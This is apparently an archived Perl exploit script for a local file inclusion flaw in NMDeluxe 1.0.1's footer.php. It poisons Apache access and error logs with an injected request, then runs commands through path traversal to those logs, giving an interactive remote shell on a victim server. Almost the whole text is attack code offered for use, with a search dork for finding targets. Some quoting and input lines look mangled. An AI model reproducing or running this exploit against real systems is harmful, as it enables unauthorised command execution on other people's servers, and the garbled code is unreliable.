NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit# Perl # # BeyazKurt B3yazKurt@Hotmail.Com # # NMDeluxe 1.0.1 (template) Local File Inclusion Exploit # # D0rk : `powered by NMDeluxe` dorka gerenk yok ama nese :p # # Dün trojen yedim a.q ! başka türlü yapamaz zate lamerler # # Download : http://wsdeluxe.com/nmdeluxe/downloads.html Your Name & Site URL :p # #Coded by elden ele ge穯 :) # use IO::Socket; use LWP::Simple; #ripped @apache=( `../../../../../var/log/httpd/access_log`, `../../../../../var/log/httpd/error_log`, `../apache/logs/error.log`, `../apache/logs/access.log`, `../../apache/logs/error.log`, `../../apache/logs/access.log`, `../../../apache/logs/error.log`, `../../../apache/logs/access.log`, `../../../../apache/logs/error.log`, `../../../../apache/logs/access.log`, `../../../../../apache/logs/error.log`, `../../../../../apache/logs/access.log`, `../logs/error.log`, `../logs/access.log`, `../../logs/error.log`, `../../logs/access.log`, `../../../logs/error.log`, `../../../logs/access.log`, `../../../../logs/error.log`, `../../../../logs/access.log`, `../../../../../logs/error.log`, `../../../../../logs/access.log`, `../../../../../etc/httpd/logs/access_log`, `../../../../../etc/httpd/logs/access.log`, `../../../../../etc/httpd/logs/error_log`, `../../../../../etc/httpd/logs/error.log`, `../../.. /../../var/www/logs/access_log`, `../../../../../var/www/logs/access.log`, `../../../../../usr/local/apache/logs/access_log`, `../../../../../usr/local/apache/logs/access.log`, `../../../../../var/log/apache/access_log`, `../../../../../var/log/apache/access.log`, `../../../../../var/log/access_log`, `../../../../../var/www/logs/error_log`, `../../../../../var/www/logs/error.log`, `../../../../../usr/local/apache/logs/error_log`, `../../../../../usr/local/apache/logs/error.log`, `../../../../../var/log/apache/error_log`, `../../../../../var/log/apache/error.log`, `../../../../../var/log/access_log`, `../../../../../var/log/error_log` ); if (@ARGV < 3) { print ` NMDeluxe 1.0.1 (template) Local File Inclusion Exploit ############################################################### Kullan.m : beyazkurt.pl [victim] [apachepath] ############################################################### `; exit(); } $host=$ARGV[0]; $path=$ARGV[1]; $apachepath=$ARGV[2]; print `Code is injecting in logfiles...\n`; $CODE=``; $socket = IO::Socket::INET->new(Proto=>`tcp`, PeerAddr=>`$host`, PeerPort=>`80`) or die `Connection failed.\n\n`; print $socket `GET `.$path.$CODE.` HTTP/1.1\r\n`; print $socket `user-Agent: `.$CODE.`\r\n`; print $socket `Host: `.$host.`\r\n`; print $socket `Connection: close\r\n\r\n`; close($socket); print `Write END to exit!\n`; print `If not working try another apache path\n\n`; print `[shell] `;$cmd = ; while($cmd !~ `END`) { $socket = IO::Socket::INET->new(Proto=>`tcp`, PeerAddr=>`$host`, PeerPort=>`80`) or die `Connection failed.\n\n`; #now include parameter print $socket `GET `.$path.`/includes/footer.php?template=`.$apache[$apachepath].`%00&cmd=$cmd HTTP/1.1\r\n`; print $socket `Host: `.$host.`\r\n`; print $socket `Accept: */*\r\n`; print $socket `Connection: close\r\n\r\n`; while ($raspuns = <$socket>) { print $raspuns; } print `[shell] `; $cmd = ; # milw0rm.com [2007-04-15]